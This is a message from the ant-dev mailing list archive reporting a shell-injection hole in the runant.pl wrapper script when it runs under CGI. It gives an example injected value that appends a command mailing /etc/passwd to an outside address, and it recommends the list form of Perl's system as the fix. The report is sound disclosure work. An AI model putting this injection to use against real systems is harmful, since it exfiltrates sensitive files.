ant-dev mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From Olivier Louchart-Fletcher <olivier.louch...@netregistry.au.com>
Subject potential security hole in runant.pl
Date Tue, 03 Oct 2000 23:02:02 GMT

Hi ant

this is from runant.pl:

> #######################################################################
> #
> # runant.pl
> #
> # wrapper script for invoking ant in a platform with Perl installed
> # this may include cgi-bin invocation, which is considered somewhat  daft.

actually this script would not be the best in a cgi env because of this
line at the end:

> system $COMMAND;
>


So in a cgi environment if the user type let say 'clean' in a form
submission then this script will run something like:

  system ("java org.apache.tools.ant.Main clean");

which is fine.

now if the same user type:  ' ; mail me@somehost.org < /etc/passwd'

the script will hapilly execute:

  system ("java org.apache.tools.ant.Main ; mail me@somehost.org < /etc/passwd 

which is less fine as it will send the passwd file to a friend.



The fix is to use the multi-param version of 'system'.

e.g.:

  system ($JAVACMD, @OTHER_ARGS);

in this case only $JAVACMD is given to the shell interpretor, the other
args are NOT but directly forward to the command as an ascii stream.

Regards.

-- 
Olivier.


NetRegistry     http://www.netregistry.au.com
olivierl@netregistry.au.com



Mime
View raw message